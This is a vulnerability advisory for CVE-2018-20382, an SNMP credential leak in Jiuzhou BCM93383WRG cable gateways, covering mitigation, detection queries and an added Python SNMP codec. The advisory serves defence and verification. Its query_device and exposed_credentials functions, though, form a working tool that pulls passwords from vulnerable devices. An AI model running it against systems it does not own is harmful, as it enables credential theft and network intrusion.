CVE-2018-20382

9.8 CRITICAL

📋 TL;DR

This vulnerability allows remote attackers to retrieve device credentials from affected Jiuzhou BCM93383WRG cable modem/gateways by reading two specific SNMP OIDs. An SNMPv1/v2c request carrying a valid read community string (which consumer devices frequently leave at a vendor default) is enough: no login to the device is needed, and the reply contains passwords and other sensitive information. Organizations using this specific device and firmware version are affected.

💻 Affected Systems

Products:
  • Jiuzhou BCM93383WRG
Versions: 139.4410mp1.3921132mp1.899.004404.004
Operating Systems: Embedded firmware
Default Config Vulnerable: ⚠️ Yes
Notes: Affects specific firmware version of this cable modem/gateway device. SNMP is often enabled by default on such devices.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise leading to network infiltration, credential theft, and potential lateral movement to other systems.

🟠

Likely Case

Unauthorized access to device configuration, credential harvesting, and potential man-in-the-middle attacks.

🟢

If Mitigated

Limited to information disclosure if SNMP access is properly restricted and monitored.

🌐 Internet-Facing: HIGH - Devices exposed to the internet can be directly exploited without authentication.
🏢 Internal Only: MEDIUM - Internal attackers or compromised systems could exploit this vulnerability.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

A single SNMP GET (or a GETNEXT/snmpwalk across the parent subtree) for the OIDs iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 and iso.3.6.1.4.1.4491.2.4.1.1.6.1.2.0 (numerically 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 and 1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0; 1.3.6.1.4.1.4491 is the CableLabs enterprise subtree used by DOCSIS cable devices) returns the credentials in the response. The only thing the attacker must supply is the read community string; no device login is involved, so any tool that can issue SNMP GETs is a working exploit.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: No known vendor advisory

Restart Required: No

Instructions:

No official patch is known. Check with the device vendor (or, for operator-supplied gateways, the ISP that provisions the device) for firmware updates.

🔧 Temporary Workarounds

Disable SNMP or restrict access

Applies to: all

Disable the SNMP service entirely, or configure access control lists so that only trusted management addresses can reach UDP/161. On cable gateways the SNMP agent may be managed by the operator's provisioning system and absent from the subscriber interface; in that case filter UDP/161 at the network boundary instead.

# Access device web interface
# Navigate to SNMP settings
# Disable SNMP or configure ACLs

Change default credentials

Applies to: all

Change all default passwords and credentials on the device. Because the SNMP reply discloses whatever credentials are currently set, rotating them only helps once SNMP access has been disabled or restricted; treat any credential that was reachable over SNMP as compromised and change it after the lockdown.

# Access device administration interface
# Navigate to password/security settings
# Change admin and user passwords

🧯 If You Can't Patch

  • Isolate affected devices in a separate network segment and block UDP/161 from untrusted networks at the boundary
  • Monitor SNMP traffic for requests naming the vulnerable OIDs (or anything under 1.3.6.1.4.1.4491.2.4.1.1.6.1)

🔍 How to Verify

Check if Vulnerable:

Use snmpget (or snmpwalk over the parent subtree) with the device's read community string to query 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 and 1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0. If either OID returns an OCTET STRING containing credential data, the device is vulnerable; a v2c noSuchObject/noSuchInstance or a v1 noSuchName error means the OID is not served. Run the check from a network position the device should not trust (for example the WAN side or a guest segment), since that is where an attacker would sit.

Check Version:

# Read the firmware version from the device web interface, or query sysDescr (1.3.6.1.2.1.1.1.0) with snmpget; DOCSIS devices typically report the software revision there. Compare against 139.4410mp1.3921132mp1.899.004404.004.

Verify Fix Applied:

After implementing workarounds, verify SNMP queries to the vulnerable OIDs no longer return credential data or are blocked entirely.

📡 Detection & Monitoring

Log Indicators:

  • SNMP GET/GETNEXT/GETBULK requests naming 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 or 1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0 (requires a log source that decodes SNMP payloads; flow and firewall logs only show UDP/161)
  • Administrative logins to the device, successful or failed, from addresses that shortly before issued SNMP requests to it

Network Indicators:

  • SNMP traffic (UDP/161) to affected devices from sources outside the management network
  • Unusual SNMP query patterns, such as walks or bursts of GETNEXT requests against the enterprise (1.3.6.1.4.1.4491) subtree

SIEM Query:

dest_port=161 AND (oid="1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0" OR oid="1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0")

Requests are sent to destination port 161; matching on source_port=161 would only catch the device's replies. The oid field assumes an SNMP-aware parser populates it from the packet payload.
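One added example that serves both the "How to Verify" check above and the detection indicators in this section (this is example code, not the page's, the vendor's or any project's): a stdlib-only SNMPv1/v2c codec that builds the GET for the two OIDs, decodes the reply to decide whether credential data came back, and, run over a captured UDP/161 payload, lists any request OIDs that fall under the credential subtree. Assumptions: SNMPv2c with a known read community string (the `public` default below is assumed, not confirmed for this device), that a vulnerable device answers with the secret as an OCTET STRING, and that a v2c noSuchObject/noSuchInstance or a v1 non-zero error-status means the OID is not served. The sample messages in the usage are constructed, not captured from a real device.

```python
"""SNMPv1/v2c codec (stdlib only) for CVE-2018-20382 checks and detection.
Added example, not vendor code. Assumes the read community is known; the
"public" default below is an assumption, not confirmed for this device."""
import socket

CREDENTIAL_OIDS = ("1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0",   # the two OIDs named
                   "1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0")   # in the advisory
T_INT, T_OCTSTR, T_NULL, T_OID, T_SEQ = 0x02, 0x04, 0x05, 0x06, 0x30
PDU_GET, PDU_GETNEXT, PDU_RESPONSE, PDU_GETBULK = 0xA0, 0xA1, 0xA2, 0xA5
NO_SUCH_OBJECT, NO_SUCH_INSTANCE = 0x80, 0x81  # v2c exception values

def _tlv(tag, body):
    """BER tag-length-value, definite length (long form above 127 bytes)."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body

def _int(n):  # non-negative INTEGER, minimal two's-complement length
    return _tlv(T_INT, n.to_bytes(n.bit_length() // 8 + 1, "big"))

def _oid(dotted):  # first two arcs packed as 40*x+y, the rest base-128
    parts = [int(p) for p in dotted.replace("iso", "1").strip(".").split(".")]
    out = bytearray([parts[0] * 40 + parts[1]])
    for sub in parts[2:]:
        chunk = [sub & 0x7F]
        while sub >> 7:
            sub >>= 7
            chunk.insert(0, 0x80 | (sub & 0x7F))
        out += bytes(chunk)
    return _tlv(T_OID, bytes(out))

def build_message(community, pdu_type, request_id, varbinds, version=1):
    """varbinds: (oid, value_tag, raw_value_bytes) triples; version 1 == v2c."""
    vbl = b"".join(_tlv(T_SEQ, _oid(o) + _tlv(t, v)) for o, t, v in varbinds)
    pdu = _int(request_id) + _int(0) + _int(0) + _tlv(T_SEQ, vbl)
    return _tlv(T_SEQ, _int(version) + _tlv(T_OCTSTR, community.encode())
                + _tlv(pdu_type, pdu))

def build_get_request(community, oids=CREDENTIAL_OIDS, request_id=0x1234):
    return build_message(community, PDU_GET, request_id, [(o, T_NULL, b"") for o in oids])

def _read_tlv(data, pos):
    tag, n, pos = data[pos], data[pos + 1], pos + 2
    if n & 0x80:  # long-form length: low 7 bits give the length-of-length
        k = n & 0x7F
        n, pos = int.from_bytes(data[pos:pos + k], "big"), pos + k
    return tag, data[pos:pos + n], pos + n

def _decode_oid(raw):  # first-arc split is valid for arcs 0 and 1 (SNMP uses 1)
    subids, val = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            subids.append(val)
            val = 0
    return ".".join(map(str, subids))

def parse_message(data):
    """Decode one SNMPv1/v2c message; ValueError/IndexError if malformed."""
    tag, body, _ = _read_tlv(data, 0)
    if tag != T_SEQ:
        raise ValueError("not an SNMP message")
    _, ver, p = _read_tlv(body, 0)
    _, comm, p = _read_tlv(body, p)
    pdu_type, pdu, _ = _read_tlv(body, p)
    _, rid, p = _read_tlv(pdu, 0)
    _, status, p = _read_tlv(pdu, p)
    _, _, p = _read_tlv(pdu, p)  # error-index, not needed here
    _, vbl, _ = _read_tlv(pdu, p)
    varbinds, p = [], 0
    while p < len(vbl):
        _, vb, p = _read_tlv(vbl, p)
        _, oid_raw, q = _read_tlv(vb, 0)
        vtag, val, _ = _read_tlv(vb, q)
        varbinds.append((_decode_oid(oid_raw), vtag, val))
    return {"version": int.from_bytes(ver, "big", signed=True),
            "community": comm.decode(errors="replace"), "pdu_type": pdu_type,
            "request_id": int.from_bytes(rid, "big", signed=True),
            "error_status": int.from_bytes(status, "big", signed=True),
            "varbinds": varbinds}

def exposed_credentials(response):
    """OID -> text for credential OIDs answered with a non-empty OCTET STRING."""
    msg = parse_message(response)
    if msg["pdu_type"] != PDU_RESPONSE or msg["error_status"] != 0:
        return {}  # v1 error (e.g. noSuchName) or not a response at all
    return {o: v.decode(errors="replace") for o, t, v in msg["varbinds"]
            if o in CREDENTIAL_OIDS and t == T_OCTSTR and v}

def probed_oids(udp_payload):
    """Detection: OIDs in a request PDU that lie under the credential subtree."""
    try:
        msg = parse_message(udp_payload)
    except (ValueError, IndexError):
        return []
    if msg["pdu_type"] not in (PDU_GET, PDU_GETNEXT, PDU_GETBULK):
        return []
    subtree = CREDENTIAL_OIDS[0].rsplit(".", 2)[0]  # ...4491.2.4.1.1.6.1
    return [o for o, _, _ in msg["varbinds"] if o == subtree or o.startswith(subtree + ".")]

def query_device(host, community="public", timeout=3.0):
    """Send the GET to UDP/161 and return the raw reply (socket.timeout if none)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_get_request(community), (host, 161))
        return s.recvfrom(4096)[0]
```

For a live check, `exposed_credentials(query_device("192.0.2.1", "public"))` returns an empty dict on a device that does not serve the OIDs and a dict of OID to value on one that does; for detection, feed each UDP/161 payload from a capture to `probed_oids()`, which also flags GETNEXT walks that start at the parent subtree rather than at the exact OIDs. The hand-rolled BER decoder covers only what these messages need (first arc 0 or 1, non-negative integers), which is deliberate: it keeps the example dependency-free and readable rather than general.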
